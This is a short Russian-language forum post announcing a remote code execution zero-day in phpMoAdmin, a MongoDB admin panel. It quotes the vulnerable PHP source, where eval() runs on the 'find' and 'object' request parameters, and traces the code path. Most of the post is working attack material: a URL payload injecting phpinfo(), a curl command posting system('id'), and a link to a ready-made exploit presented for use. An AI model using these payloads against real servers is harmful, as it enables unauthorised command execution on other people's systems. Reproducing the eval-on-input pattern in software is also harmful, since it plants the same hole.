MongoDB phpMoAdmin Zero-day

RCE. Новость тут .
Видео https://vimeo.com/121072742

PHP:

$find = array();
        if (isset($_GET['find']) && $_GET['find']) {
            $_GET['find'] = trim($_GET['find']);
            if (strpos($_GET['find'], 'array') === 0) {
                eval('$find = ' . $_GET['find'] . ';');
            } else if (is_string($_GET['find'])) {
                if ($findArr = json_decode($_GET['find'], true)) {
                    $find = $findArr;
                }
            }
        }

PHP:

http://localhost/moadmin.php?action=listRows&find=array(phpinfo())&collection=123

UP: на секлисте запостили другой способ

Code:

curl "http://path.to/moadmin.php"; -d "object=1;system('id');exit"

PHP:

Filename: moadmin.php
1. create new moadminComponent object
1977: $mo = new moadminComponent;

2. if the http-post parameter 'object' is set
738: class moadminComponent {
...
762: public function __construct() {
...
786: if (isset($_POST['object'])) {
787:    if (self::$model->saveObject($_GET['collection'],
$_POST['object'])) {
...

3. evaluate the value of 'object' as PHP code
692: public function saveObject($collection, $obj) {
693:    eval('$obj=' . $obj . ';'); //cast from string to array


Готовый сплой: https://github.com/XiphosResearch/exploits/tree/master/phpMoAdmin